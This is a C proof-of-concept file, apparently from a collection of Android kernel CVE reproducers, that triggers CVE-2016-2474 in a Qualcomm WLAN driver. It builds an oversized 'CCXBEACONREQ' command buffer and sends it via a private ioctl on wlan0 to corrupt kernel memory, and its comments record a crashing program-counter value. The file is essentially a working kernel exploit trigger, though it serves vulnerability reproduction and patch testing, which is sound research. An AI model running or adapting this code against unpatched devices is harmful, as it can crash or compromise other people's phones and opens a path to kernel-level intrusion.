forked from ScottyBauer/Android_Kernel_CVE_POCs
CVE-2016-2474.c
/* CVE-2016-2474.c
*
* https://www.codeaurora.org/multiple-vulnerabilities-wlan-driver-cve-2016-2470-cve-2016-2472-cve-2016-2474-cve-2016-2498-cve
*
* https://code.google.com/p/android/issues/detail?id=205742
* https://code.google.com/p/android/issues/detail?id=212337
*
*
* https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=681c310490e49adc43065d1d11006c5a5dc43568
*
**/
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
/*
 * Descriptor that main() hands to the WLAN driver through ifreq.ifr_data.
 *
 * NOTE(review): the tag and field order presumably mirror the driver's own
 * definition of the same name -- confirm against the driver source before
 * reordering or resizing any member.
 */
struct hdd_priv_data_s {
    char *buf;      /* user-space buffer holding the command text */
    int used_len;   /* never written by this program (stays zero) */
    int total_len;  /* size advertised for buf; main() sets it to 8192 */
};

typedef struct hdd_priv_data_s hdd_priv_data_t;
/*
 * Pad the command buffer with repeated " 1 3 2 4" argument groups.
 *
 * data: buffer that already holds `used` bytes of command text.
 * used: offset at which the first group is written.
 *
 * Writing is bounded by snprintf() to the first 8192 bytes of `data`; the
 * loop stops once the running offset passes that limit. snprintf() returns
 * the length it *would* have written, so the final (truncated or zero-size)
 * call is what pushes the offset past the limit and ends the loop.
 *
 * Author's note on the four values in each group, in order:
 *   1st: > 0, 2nd: 1-165, 3rd: 0-2, 4th: > 0.
 * Author's recorded crash value: pc[<0003000100040203>].
 */
static void fill_data(char *data, int used)
{
    enum { FILL_LIMIT = 8192 };
    int offset = used;

    while (!(offset > FILL_LIMIT)) {
        size_t room = (size_t)(FILL_LIMIT - offset);
        int produced = snprintf(data + offset, room,
                                " %d %d %d %d", 1, 3, 2, 4);

        offset += produced;
    }
}
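/*
 * Reproducer for CVE-2016-2474 (advisory and upstream fix commit are linked
 * in the file header).
 *
 * Steps, as visible below:
 *   1. open an AF_INET socket to carry the interface ioctl;
 *   2. map three anonymous pages and build a "CCXBEACONREQ -1 " command
 *      followed by repeated argument groups (see fill_data());
 *   3. point ifreq.ifr_data at an hdd_priv_data_t describing that buffer and
 *      issue SIOCDEVPRIVATE + 1 on "wlan0".
 *
 * NOTE(review): on a kernel that carries the linked fix the driver is
 * expected to reject the request; confirm the exact errno against a patched
 * build rather than assuming one.
 *
 * Returns EXIT_FAILURE if the socket or the mapping cannot be set up,
 * otherwise 0 regardless of the ioctl result (the result is only printed).
 */
int main(void)
{
    enum { CMD_BUF_LEN = 8192, MAP_LEN = 4096 * 3 };
    static const char cmd_prefix[] = "CCXBEACONREQ -1 ";

    struct ifreq freak = { 0 };
    hdd_priv_data_t priv_data = { 0 };
    int fd;
    int rc;

    /* ifr_name is zero-initialised above, so the 5-byte copy stays terminated. */
    memcpy(freak.ifr_name, "wlan0", 5);

    fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) {
        /* Stop here: every later step needs a valid descriptor. */
        printf("Failed with %s\n", strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Got socket # %d\n", fd);

    priv_data.total_len = CMD_BUF_LEN;
    priv_data.buf = mmap(NULL, MAP_LEN, PROT_READ|PROT_WRITE,
                         MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0);
    if (priv_data.buf == MAP_FAILED) {
        /* mmap() reports failure as MAP_FAILED, not NULL; never write to it. */
        printf("Failed with %s\n", strerror(errno));
        close(fd);
        return EXIT_FAILURE;
    }

    strcpy(priv_data.buf, cmd_prefix);
    fill_data(priv_data.buf, (int)(sizeof cmd_prefix - 1));

    freak.ifr_data = (void*)&priv_data;

    /* Only consult errno when the call actually failed; otherwise it is stale. */
    rc = ioctl(fd, SIOCDEVPRIVATE + 1, &freak);
    if (rc < 0)
        printf("ret is %s\n", strerror(errno));
    else
        printf("ret is %d\n", rc);

    close(fd);
    munmap(priv_data.buf, MAP_LEN);
    return 0;
}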